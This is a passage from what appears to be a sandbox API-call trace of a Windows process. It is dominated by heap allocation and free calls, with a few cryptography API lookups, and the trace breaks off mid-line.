[0107.855] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0107.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0107.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0107.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa60 [0107.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0107.855] PeekMessageW (in: lpMsg=0x144db3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144db3c) returned 0 [0107.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0107.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0107.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0107.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0107.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0107.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0107.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0107.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0107.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0107.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0107.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0107.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0107.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0107.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0107.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0107.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0107.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0107.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0107.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0107.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0107.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0107.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0107.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0107.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0107.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0107.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0107.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0107.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0107.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0107.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0107.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0107.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0107.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0107.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0107.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0107.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0107.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0107.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0107.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0107.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0107.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0107.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0107.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0107.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0107.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0107.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0107.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0107.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0107.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0107.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0107.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0107.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0107.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0107.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0107.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0107.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0107.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0107.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0107.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0107.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0107.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0107.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0107.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0108.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0108.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0108.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0108.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0108.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0108.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0108.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0108.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0108.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0108.107] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0108.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0108.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0108.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0108.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0108.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0108.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0108.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0108.107] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0108.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0108.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0108.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0108.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0108.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0108.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0108.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0108.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0108.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0108.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0108.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0108.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0108.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0108.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0108.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0108.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0108.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0108.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0108.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0108.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0108.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0108.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0108.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0108.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0108.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0108.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0108.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0108.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0108.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0108.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0108.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0108.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0108.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0108.108] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0108.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0108.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0108.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0108.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0108.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0108.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0108.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0108.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0108.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0108.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0108.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0108.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0108.109] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0108.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0108.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0108.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0108.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0108.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0108.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0108.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0108.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0108.110] CryptGetKeyParam (in: hKey=0x41ac2c0, dwParam=0x7, pbData=0x43e2a60, pdwDataLen=0x144db58, dwFlags=0x0 | out: pbData=0x43e2a60*=0x6610, pdwDataLen=0x144db58*=0x4) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0108.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0108.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0108.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0108.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0108.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0108.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0108.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0108.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0108.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0108.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0108.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0108.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0108.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0108.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0108.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0108.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0108.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0108.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0108.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0108.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0108.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0108.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0108.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0108.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0108.111] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0108.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0108.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0108.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0108.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0108.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0108.112] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0108.112] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0108.112] HeapFree (in: 